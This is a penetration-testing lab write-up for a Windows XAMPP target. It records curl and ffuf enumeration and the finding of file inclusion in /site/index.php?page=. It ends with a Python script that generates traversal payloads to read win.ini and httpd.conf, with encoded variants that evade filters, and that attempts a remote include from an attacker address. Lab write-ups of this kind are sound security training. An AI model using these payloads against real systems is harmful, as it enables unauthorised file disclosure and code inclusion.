Web


Nmap discovered a web server on target port 4443. The running service is Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6).

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -i http://$IP:4443/
HTTP/1.1 302 Found
Date: Fri, 07 Feb 2025 18:34:00 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Location: http://192.168.134.53:4443/dashboard/
Content-Length: 0
Content-Type: text/html; charset=UTF-8

The root redirects (302) to http://192.168.134.53:4443/dashboard/

It’s the default XAMPP Apache installation. This web server appears identical to the one on target port 8080, so the default XAMPP paths (/dashboard/, /xampp/, /phpmyadmin/) are expected; anything outside them is worth a closer look.

Fuzzing


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP:4443/FUZZ -ic
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.134.53:4443/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccess               [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 102ms]
.htpasswd               [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 173ms]
aux                     [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 38ms]
cgi-bin/                [Status: 403, Size: 1060, Words: 103, Lines: 43, Duration: 37ms]
com3                    [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 26ms]
com2                    [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 27ms]
com4                    [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 23ms]
com1                    [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 138ms]
con                     [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 50ms]
dashboard               [Status: 301, Size: 351, Words: 22, Lines: 10, Duration: 24ms]
favicon.ico             [Status: 200, Size: 30894, Words: 412, Lines: 6, Duration: 27ms]
img                     [Status: 301, Size: 345, Words: 22, Lines: 10, Duration: 26ms]
licenses                [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 117ms]
lpt1                    [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 76ms]
lpt2                    [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 89ms]
nul                     [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 67ms]
phpmyadmin              [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 125ms]
prn                     [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 48ms]
server-info             [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 39ms]
server-status           [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 39ms]
site                    [Status: 301, Size: 346, Words: 22, Lines: 10, Duration: 20ms]
webalizer               [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 83ms]
xampp                   [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 23ms]
:: Progress: [20478/20478] :: Job [1/1] :: 232 req/sec :: Duration: [0:00:53] :: Errors: 0 ::

/site/


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -I http://$IP:4443/site/
HTTP/1.1 301 Moved Permanently
Date: Fri, 07 Feb 2025 21:26:57 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Location: index.php?page=main.php
Content-Type: text/html; charset=UTF-8

301 to /site/index.php?page=main.php

The page parameter of index.php takes a filename (main.php), which suggests the value is passed to a PHP include. That makes it a candidate for local and remote file inclusion, so both are tested next.

LFI


LFI confirmed

RFI


RFI confirmed. Moving on to the Exploitation phase.
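A scripted version of the LFI and RFI checks against the page parameter, added here as an example; it is not code from the original write-up. The target URL is taken from the 301 above. The Windows file paths and their signatures, the attacker URL 192.168.45.200, the marker string, and the FakeXamppTarget class (a constructed stand-in that emulates include($_GET['page']) so the script runs without the lab) are assumptions. Two caveats are built in: PHP 7.4 rejects NUL bytes, so no %00 payloads are generated, and RFI only works when allow_url_include is On, so the probe also reports the allow_url_include=0 warning XAMPP prints when it is Off.

```python
"""Probe /site/index.php?page= for local and remote file inclusion.

Added example, not from the original write-up. Target URL comes from the
page's 301; file paths, attacker URL, marker and the fake target are assumed.
"""
from __future__ import annotations

import posixpath
import re
import sys
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import parse_qs, quote, urlsplit

Fetch = Callable[[str], str]  # URL -> response body

BASE_URL = "http://192.168.134.53:4443/site/index.php"  # from the 301 on the page

# Files present on a default Windows/XAMPP host, with a signature that cannot be
# confused with the site's own HTML. Paths are assumptions, not from the page.
LFI_PROBES = [
    ("C:/Windows/win.ini", re.compile(r"^\[fonts\]", re.I | re.M)),
    ("C:/xampp/apache/conf/httpd.conf", re.compile(r"^ServerRoot\b", re.M)),
]

# Printed by PHP when an http:// include is attempted with allow_url_include=Off
# and display_errors=On (XAMPP ships that way). Assumption about the target.
RFI_DISABLED = "allow_url_include=0"


def traversal_variants(path: str, max_depth: int = 6) -> List[str]:
    """Candidate `page` values for one target file.

    PHP 7.4 refuses paths containing NUL, so the old %00 suffix trick is left out.
    Order: absolute Windows path (both slash styles), ../ prefixes of growing
    depth, then every variant URL-encoded once (the server decodes one layer,
    which gets past naive "../" string filters sitting in front of PHP).
    """
    relative = re.sub(r"^[A-Za-z]:[\\/]", "", path)  # Windows/win.ini
    variants = [path, path.replace("/", "\\")]
    for depth in range(1, max_depth + 1):
        variants.append("../" * depth + relative)
        variants.append("..\\" * depth + relative.replace("/", "\\"))
    variants += [quote(v, safe="") for v in variants]
    return variants


def find_lfi(fetch: Fetch) -> Optional[str]:
    """Return the first `page` value whose response contains a known file."""
    for file_path, signature in LFI_PROBES:
        for payload in traversal_variants(file_path):
            if signature.search(fetch(f"{BASE_URL}?page={payload}")):
                return payload
    return None


def probe_rfi(fetch: Fetch, attacker_url: str, marker: str) -> Tuple[str, Optional[str]]:
    """Include an attacker-hosted file that only prints `marker` (not a shell).

    Returns ("included", payload) when the marker comes back, ("disabled", None)
    when PHP reports allow_url_include=0, otherwise ("none", None).
    """
    for payload in (attacker_url, attacker_url + "?"):  # ? swallows any appended suffix
        body = fetch(f"{BASE_URL}?page={payload}")
        if marker in body:
            return "included", payload
        if RFI_DISABLED in body:
            return "disabled", None
    return "none", None


def http_fetch(url: str) -> str:
    """Live fetcher; errors (HTTP or network) are returned as a body that matches nothing."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    except Exception as exc:
        return f"fetch-error: {exc}"


class FakeXamppTarget:
    """Constructed offline stand-in: emulates include($_GET['page']) executed from
    C:/xampp/htdocs/site on a tiny fake disk, with allow_url_include switchable."""
    WEBROOT = "C:/xampp/htdocs/site"
    FILES = {
        "C:/xampp/htdocs/site/main.php": "<h1>Welcome</h1>",
        "C:/Windows/win.ini": "; for 16-bit app support\n[fonts]\n[extensions]\n",
        "C:/xampp/apache/conf/httpd.conf": 'ServerRoot "/xampp/apache"\n',
    }

    def __init__(self, allow_url_include: bool, remote_files: Optional[Dict[str, str]] = None):
        self.allow_url_include = allow_url_include
        self.remote_files = remote_files or {}

    def __call__(self, url: str) -> str:
        page = parse_qs(urlsplit(url).query).get("page", ["main.php"])[0]
        if re.match(r"^https?://", page, re.I):
            if not self.allow_url_include:
                return f"Warning: include(): http:// wrapper is disabled by {RFI_DISABLED}"
            return self.remote_files.get(page.rstrip("?"), "Warning: include(): failed to open stream")
        norm = page.replace("\\", "/")
        if not re.match(r"^[A-Za-z]:/", norm):  # relative: resolve against the web root
            norm = posixpath.normpath(f"{self.WEBROOT}/{norm}")
        return self.FILES.get(norm, f"Warning: include({page}): failed to open stream")


if __name__ == "__main__":
    marker, attacker = "MARKER-9f2c", "http://192.168.45.200/probe.txt"  # assumed attacker host
    fetch: Fetch = http_fetch if "--live" in sys.argv else FakeXamppTarget(True, {attacker: marker})
    print("LFI payload:", find_lfi(fetch))
    print("RFI result:", probe_rfi(fetch, attacker, marker))
```

Without --live the script runs against the fake and reports the absolute win.ini path and a successful remote include; with --live it sends the same requests to the host in BASE_URL, which still needs the marker file served from the attacker address first.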